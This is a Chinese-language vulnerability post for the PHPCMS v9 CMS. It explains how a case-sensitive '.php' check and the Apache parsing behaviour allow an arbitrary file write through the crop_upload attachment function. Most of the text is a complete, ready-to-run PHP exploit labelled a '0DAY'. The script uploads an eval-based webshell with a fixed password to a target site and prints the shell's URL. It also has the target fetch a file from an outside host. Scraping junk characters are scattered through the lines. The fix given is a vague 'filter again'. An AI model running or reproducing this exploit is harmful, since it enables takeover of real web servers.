PHPCMS v9 Getshell

admin

漏洞类型： 文件上传导致任意代码执行

简要描述：

phpcms v9 getshell (apache)
详细说明：
5 V: p$ E5 p7 k0 ], z& M
0 s7 U& j! r4 E; M8 N) G6 C漏洞文件：phpcms\modules\attachment\attachments.php

public function crop_upload() {  (isset($GLOBALS["HTTP_RAW_POST_DATA"])) {  $pic = $GLOBALS["HTTP_RAW_POST_DATA"];  if (isset($_GET['width']) && !empty($_GET['width'])) {  $width = intval($_GET['width']);  }  if (isset($_GET['height']) && !empty($_GET['height'])) {  $height = intval($_GET['height']);  }  if (isset($_GET['file']) && !empty($_GET['file'])) {  $_GET['file'] = str_replace(';','',$_GET['file']);//过滤了分号  if(is_image($_GET['file'])== false || strpos($_GET['file'],'.php')!==false) exit();//is_image()检测是个关键  if (strpos($_GET['file'], pc_base::load_config('system', 'upload_url'))!==false) {  $file = $_GET['file'];  $basenamebasename = basename($file);//获取带有后缀的文件名  if (strpos($basename, 'thumb_')!==false) {  $file_arr = explode('_', $basename);  $basename = array_pop($file_arr);  }  $new_file = 'thumb_'.$width.'_'.$height.'_'.$basename;  } else {  pc_base::load_sys_class('attachment','',0);  $module = trim($_GET['module']);  $catid = intval($_GET['catid']);  $siteid = $this->get_siteid();  $attachment = new attachment($module, $catid, $siteid);  $uploadedfile['filename'] = basename($_GET['file']);  $uploadedfile['fileext'] = fileext($_GET['file']);  if (in_array($uploadedfile['fileext'], array('jpg', 'gif', 'jpeg', 'png', 'bmp'))) {  $uploadedfile['isimage'] = 1;  }  $file_path = $this->upload_path.date('Y/md/');  pc_base::load_sys_func('dir');  dir_create($file_path);  $new_file = date('Ymdhis').rand(100, 999).'.'.$uploadedfile['fileext'];  $uploadedfile['filepath'] = date('Y/md/').$new_file;  $aid = $attachment->add($uploadedfile);  }  $filepath = date('Y/md/');  file_put_contents($this->upload_path.$filepath.$new_file, $pic);//文件名可控、$pic可控  } else {  return false;  }  echo pc_base::load_config('system', 'upload_url').$filepath.$new_file;  exit;  }  }
后缀检测：phpcms\modules\attachment\functions\global.func.php



6 t  O9 p: F1 Z' gfunction is_image($file) { 　　 $ext_arr = array('jpg','gif','png','bmp','jpeg','tiff'); 　　 $ext = fileext($file);关键地方 　　 return in_array($ext,$ext_arr) ? $ext_arr :false; 　　}  
0 D  o  Y- H3 C* J( Q
关键函数:


5 P9 m. p5 G; V& N  V! a
function fileext($filename) {  return strtolower(trim(substr(strrchr($filename, '.'), 1, 10))); }  
: r4 \) D1 D9 L
# o8 N$ q" ^8 A2 x) a6 ^1 s. i　　Fileext函数是对文件后缀名的提取。
根据此函数我们如果上传文件名为ddd.Php.jpg%20%20%20%20%20%20%20Php
& e; R: O# ~. g) Q* ^  ]经过此函数提取到的后缀还是jpg，因此正在is_image()函数中后缀检测被绕过了。
2 ?3 x  j% y% ~我们回到public function crop_upload() 函数中
if(is_image($_GET['file'])== false || strpos($_GET['file'],'.php')!==false) exit();
7 ?9 S( y9 |8 l8 \' |在经过了is_image的判断之后又来了个.php的判断，在此程序员使用的是strpos函数
这个函数是对大小写敏感的函数我们使用.Php就可以直接绕过了。
经过上边的两层的过滤我们的ddd.Php.jpg%20%20%20%20%20%20%20Php后缀依然有效。
最后$basename变量的值就为ddd.Php.jpg%20%20%20%20%20%20%20Php 然后使用file_put_contents函数写入到了指定目录。
- U( n0 T- Y, {4 T1 J/ H看见ddd.Php.jpg%20%20%20%20%20%20%20Php这个后缀，大家应该明白了，它用在apache搭建的服务器上可以被解析。
# @, x/ b# G1 o0 j漏洞证明：
2 k, p; ^2 L9 q; g, b" H
exp:
5 l- |. S4 @( ]' C0 L  ?" Y
<?php
error_reporting(E_ERROR);
9 @# m( E% H4 Fset_time_limit(0);
5 x3 K: k% h2 w. n$pass="ln";
print_r('
+---------------------------------------------------------------------------+
PHPCms V9 GETSHELL 0DAY
" k9 G0 d6 W0 E' L7 a9 W! |( d5 rcode by L.N.

apache 适用(利用的apache的解析漏洞) // 云安全 www.yunsec.net
# s& v/ W7 F: f: f+---------------------------------------------------------------------------+
7 i8 `- f1 R5 e  m% b% p' f');
' M% x9 [$ V* {if ($argc < 2) {
+ a5 r  U6 l( ^  k( zprint_r('
: O; l6 t/ L5 }+ v* U+---------------------------------------------------------------------------+
! B1 J7 U% a' N2 A. aUsage: php '.$argv[0].' url path
* y, M: K$ X/ p6 O$ Q6 A" Z" ^
Example:
/ |& F8 E: l+ `" g! J1.php '.$argv[0].' lanu.sinaapp.com
2.php '.$argv[0].' lanu.sinaapp.com /phpcms
8 O2 w" _& l- w2 u% ^+---------------------------------------------------------------------------+
');
exit;
/ X# j2 K" Q# t# W9 u* I& l1 U' A" Y}

$url = $argv[1];
! y- X* c, z+ X. Z# `' _# s$path = $argv[2];
1 P& T! z: K" x; c7 n* Y* L* M$phpshell = '<?php @eval($_POST[\''.$pass.'\']);?>';
$file = '1.thumb_.Php.JPG%20%20%20%20%20%20%20Php';
if($ret=Create_dir($url,$path))
{
//echo $ret;
3 X$ S3 T7 T) j7 u$pattern = "|Server:[^,]+?|U";
; l$ F* G, r; L3 M2 @' Gpreg_match_all($pattern, $ret, $matches);
6 ~) E% [0 k- H) v# V# Yif($matches[0][0])
! v( E9 v* a" ]! @{
! N; p5 C) E, Dif(strpos($matches[0][0],'Apache') == false)
{
echo "\n亲！此网站不是apache的网站。\n";exit;
}
}
$ret = GetShell($url,$phpshell,$path,$file);
" E. H% E% F1 [* y" E$ y$pattern = "|http:\/\/[^,]+?\.,?|U";
/ T5 l& ?6 f! P2 c( `# r: o" d1 epreg_match_all($pattern, $ret, $matches);
if($matches[0][0])
. S& g3 u9 g5 {0 Z0 e{
0 j- T( t: U+ e5 q& N3 Uecho "\n".'密码为: '.$pass."\n";
echo "\r\nurl地址: ".$matches[0][0].'JPG%20%20%20%20%20%20%20Php'."\n";exit;
2 Z! c2 T5 v/ N2 y! H4 l- C  s  ^1 Q}
else
9 D! P% V" v4 l$ S{
8 X. z. O  l& I( D7 X4 z; X3 l$pattern = "|\/uploadfile\/[^,]+?\.,?|U";
preg_match_all($pattern, $ret, $matches);
if($matches[0][0])
{
echo "\n".'密码为: '.$pass."\n";
echo "\r\nurl地址:".'http://'.$url.$path.$matches[0][0].'JPG%20%20%20%20%20%20%20Php'."\n";exit;
' F, r+ N& s) {. `}
, H, n& I  |; U# S6 l2 nelse
: m- x- H) U9 R{
echo "\r\n没得到！\n";exit;
2 W' a* o' ]$ G5 z}
# A) Z' b$ R8 O( o: m9 t0 s}
2 z/ v! w1 j& v+ e: h}
+ W# ?% r" D5 g  F) n4 v
function GetShell($url,$shell,$path,$js)
{
$content =$shell;
$data = "POST ".$path."/index.php?m=attachment&c=attachments&a=crop_upload&width=6&height=6&file=http://".$url.$path."/uploadfile/".$js." HTTP/1.1\r\n";
$data .= "Host: ".$url."\r\n";
3 J2 @4 \4 X: `5 Z1 k' Z# o9 K" I1 r$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
8 F9 w5 q4 ~3 y0 k# F& q$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
' p9 r( o3 G6 O& v4 `' B" p$data .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
) r4 d1 U: b3 C: @* m: y1 A) h1 P$data .= "Connection: close\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
7 Y# J/ B% H% S9 d! w$data .= $content."\r\n";
1 ?5 F, T% V. v8 Y% Y1 m5 P7 f$ock=fsockopen($url,80);
if (!$ock)
; t2 ~! C* Q( T. V- d{
0 K6 V, j+ L2 y4 @# Gecho "\n"."此网站没有回应,检测url是否输入正确"."\n";exit;
}
, M% x7 }5 [7 U+ [% Q. nelse
" j3 X2 H) s7 g- B- m{
0 o' f# E0 e' V6 t1 Ofwrite($ock,$data);
- i: u- v1 V6 ~: C) Q+ {$resp = '';
9 `3 y2 ?3 p8 j' n0 @* Cwhile (!feof($ock))
{
8 R3 f1 ^0 K* P; L( B$resp.=fread($ock, 1024);
}
/ k3 q8 i# c& Preturn $resp;
}
}
5 g. Q- T. D/ c  m6 P# o8 ?' T
function Create_dir($url,$path='')
$ k" B9 O- h$ C( [% |# C. Q{
; t! n  ]3 U3 Z9 @4 i& E$content ='I love you';
$data = "POST ".$path."/index.php?m=attachment&c=attachments&a=crop_upload&width=6&height=6&file=http://lanu.sinaapp.com/1.jpg HTTP/1.1\r\n";
$data .= "Host: ".$url."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
6 x# R1 F& d. `2 Y$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
$data .= "Connection: close\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
( A- e' v" Q1 p. y" K1 \$data .= $content."\r\n";
/ Z, W# ]7 N- m+ @( j: q1 K$ock=fsockopen($url,80);
0 d, Y( v; E0 G; c  q; hif (!$ock)
& C6 i& M$ v7 ~( O" s/ r{
echo "\n"."此网站没有回应,检测url是否输入正确"."\n";exit;
}
fwrite($ock,$data);
" z/ P. E0 }4 r( D$resp = '';
& i, v5 }8 W; q1 \while (!feof($ock))
{
; l" M0 Z9 y" q5 Q$resp.=fread($ock, 1024);
7 P$ [+ C+ z6 X4 ]5 ?}
: k/ J' O* k+ X  f6 q6 C* F. d! Jreturn $resp;
4 t! X- }/ M7 U' `4 q9 A- D2 y1 \}
& J. V1 j, e  f  {' o?>

2 N  J! ], t- W/ o修复方案：

过滤过滤再过滤
/ e2 o0 M! ]7 T/ y' U9 H
' i3 t# \" G! K. L